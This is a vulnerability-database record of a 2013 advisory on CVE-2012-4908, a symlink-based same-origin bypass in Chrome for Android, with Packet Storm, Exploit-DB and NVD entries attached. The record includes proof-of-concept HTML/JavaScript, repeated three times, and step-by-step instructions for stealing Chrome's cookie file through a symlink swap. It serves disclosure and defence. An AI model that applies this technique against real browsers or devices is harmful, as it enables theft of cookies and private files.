{"id": "SECURITYVULNS:DOC:28941", "bulletinFamily": "software", "title": "Chrome for Android - Bypassing SOP for Local Files By Symlinks", "description": "\r\n\r\nCVE Number: CVE-2012-4908\r\nTitle: Chrome for Android - Bypassing SOP for Local Files By Symlinks\r\nAffected Software: Confirmed on Chrome for Android v18.0.1025123\r\nCredit: Takeshi Terada\r\nIssue Status: v18.0.1025308 was released which fixes this vulnerability\r\n\r\nOverview:\r\n Chrome for Android's Same-Origin Policy for local files (file: URI) can be\r\n bypassed by using symbolic links. It results in theft of Chrome's private\r\n files by malicious Android apps.\r\n\r\nDetails:\r\n Chrome for Android seems to forbid a local file to read another file,\r\n except for the originating file itself.\r\n\r\n http://code.google.com/p/chromium/issues/detail?id=37586\r\n\r\n However, it is possible to circumvent the restriction by a trick using\r\n symbolic link.\r\n\r\n This issue enables malicious Android apps to steal Chrome's private\r\n files such as Chrome's Cookie file, bookmark file, and so on.\r\n\r\n As an example, steps to steal Chrome's Cookie file are described below:\r\n\r\n 1. An attacker's app creates a malicious HTML file, and makes Chrome load\r\n its URL with file: URI. The malicious HTML contains JavaScript code\r\n which, a few seconds later, tries to read the content of same URL with\r\n the malicious HTML itself via XMLHttpRequest.\r\n\r\n <body>\r\n <u>Wait a few seconds.</u>\r\n <script>\r\n function doitjs() {\r\n var xhr = new XMLHttpRequest;\r\n xhr.onload = function() {\r\n alert(xhr.responseText);\r\n };\r\n xhr.open('GET', document.URL);\r\n xhr.send(null);\r\n }\r\n setTimeout(doitjs, 8000);\r\n </script>\r\n </body>\r\n\r\n 2. Before XHR fires, the attacker's app replaces the malicious\r\n HTML file with a symlink pointing to Chrome's Cookie file.\r\n\r\n 3. When XHR fires, Chrome follows the symlink and provides the\r\n content of the Chrome's Cookie file to the malicious HTML.\r\n\r\n The attacker's app can also get the content of Chrome's other private\r\n files in a similar manner.\r\n\r\nProof of Concept:\r\n HTML/JavaScript is shown above. At present I do not have plans to disclose\r\n PoC of malicious Android app.\r\n\r\nTimeline:\r\n 2012/08/19 Reported to Google security team\r\n 2012/08/25 Re-reported to Chrome security team\r\n 2012/09/12 Vender announced v18.0.1025308\r\n 2013/01/07 Disclosure of this advisory\r\n\r\nRecommendation:\r\n Upgrade to the latest version.\r\n\r\nReference:\r\n http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html\r\n https://code.google.com/p/chromium/issues/detail?id=144866\r\n", "published": "2013-01-10T00:00:00", "modified": "2013-01-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28941", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2012-4908"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:46", "edition": 1, "viewCount": 27, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2018-08-31T11:10:46", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-4908"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:119303"]}, {"type": "exploitdb", "idList": ["EDB-ID:37795"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12820"]}], "modified": "2018-08-31T11:10:46", "rev": 2}, "vulnersScore": 6.2}, "affectedSoftware": []}

{"cve": [{"lastseen": "2020-12-09T19:47:24", "description": "Google Chrome before 18.0.1025308 on Android allows remote attackers to bypass the Same Origin Policy and obtain access to local files via vectors involving a symlink.", "edition": 5, "cvss3": {}, "published": "2012-09-13T20:55:00", "title": "CVE-2012-4908", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4908"], "modified": "2012-09-14T13:30:00", "cpe": ["cpe:/a:google:chrome:18.0.1025306"], "id": "CVE-2012-4908", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4908", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:18.0.1025306:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:21:49", "description": "", "published": "2013-01-08T00:00:00", "type": "packetstorm", "title": "Chrome For Android Bypassing SOP Flaw", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-4908"], "modified": "2013-01-08T00:00:00", "id": "PACKETSTORM:119303", "href": "https://packetstormsecurity.com/files/119303/Chrome-For-Android-Bypassing-SOP-Flaw.html", "sourceData": "`CVE Number: CVE-2012-4908 \nTitle: Chrome for Android - Bypassing SOP for Local Files By Symlinks \nAffected Software: Confirmed on Chrome for Android v18.0.1025123 \nCredit: Takeshi Terada \nIssue Status: v18.0.1025308 was released which fixes this vulnerability \n \nOverview: \nChrome for Android's Same-Origin Policy for local files (file: URI) can be \nbypassed by using symbolic links. It results in theft of Chrome's private \nfiles by malicious Android apps. \n \nDetails: \nChrome for Android seems to forbid a local file to read another file, \nexcept for the originating file itself. \n \nhttp://code.google.com/p/chromium/issues/detail?id=37586 \n \nHowever, it is possible to circumvent the restriction by a trick using \nsymbolic link. \n \nThis issue enables malicious Android apps to steal Chrome's private \nfiles such as Chrome's Cookie file, bookmark file, and so on. \n \nAs an example, steps to steal Chrome's Cookie file are described below: \n \n1. An attacker's app creates a malicious HTML file, and makes Chrome load \nits URL with file: URI. The malicious HTML contains JavaScript code \nwhich, a few seconds later, tries to read the content of same URL with \nthe malicious HTML itself via XMLHttpRequest. \n \n<body> \n<u>Wait a few seconds.</u> \n<script> \nfunction doitjs() { \nvar xhr = new XMLHttpRequest; \nxhr.onload = function() { \nalert(xhr.responseText); \n}; \nxhr.open('GET', document.URL); \nxhr.send(null); \n} \nsetTimeout(doitjs, 8000); \n</script> \n</body> \n \n2. Before XHR fires, the attacker's app replaces the malicious \nHTML file with a symlink pointing to Chrome's Cookie file. \n \n3. When XHR fires, Chrome follows the symlink and provides the \ncontent of the Chrome's Cookie file to the malicious HTML. \n \nThe attacker's app can also get the content of Chrome's other private \nfiles in a similar manner. \n \nProof of Concept: \nHTML/JavaScript is shown above. At present I do not have plans to disclose \nPoC of malicious Android app. \n \nTimeline: \n2012/08/19 Reported to Google security team \n2012/08/25 Re-reported to Chrome security team \n2012/09/12 Vender announced v18.0.1025308 \n2013/01/07 Disclosure of this advisory \n \nRecommendation: \nUpgrade to the latest version. \n \nReference: \nhttp://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html \nhttps://code.google.com/p/chromium/issues/detail?id=144866 \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/119303/androidchrome-bypass.txt"}], "exploitdb": [{"lastseen": "2016-02-04T06:35:32", "description": "Google Chrome for Android Same-origin Policy Bypass Local Symlink Weakness. CVE-2012-4908. Remote exploit for android platform", "published": "2012-09-12T00:00:00", "type": "exploitdb", "title": "Google Chrome for Android Same-origin Policy Bypass Local Symlink Weakness", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-4908"], "modified": "2012-09-12T00:00:00", "id": "EDB-ID:37795", "href": "https://www.exploit-db.com/exploits/37795/", "sourceData": "source: http://www.securityfocus.com/bid/55523/info\r\n \r\nGoogle Chrome for Android is prone to multiple vulnerabilities.\r\n \r\nAttackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible.\r\n \r\nVersions prior to Chrome for Android 18.0.1025308 are vulnerable. \r\n\r\n<body>\r\n <u>Wait a few seconds.</u>\r\n <script>\r\n function doitjs() {\r\n var xhr = new XMLHttpRequest;\r\n xhr.onload = function() {\r\n alert(xhr.responseText);\r\n };\r\n xhr.open('GET', document.URL);\r\n xhr.send(null);\r\n }\r\n setTimeout(doitjs, 8000);\r\n </script>\r\n</body>", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/37795/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "cvelist": ["CVE-2012-4909", "CVE-2012-4905", "CVE-2012-4907", "CVE-2012-4906", "CVE-2012-4908"], "description": "Multiple protection bypass and privilege escalation vulnerabilities.", "edition": 1, "modified": "2013-01-10T00:00:00", "published": "2013-01-10T00:00:00", "id": "SECURITYVULNS:VULN:12820", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12820", "title": "Google Chrome for Android multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}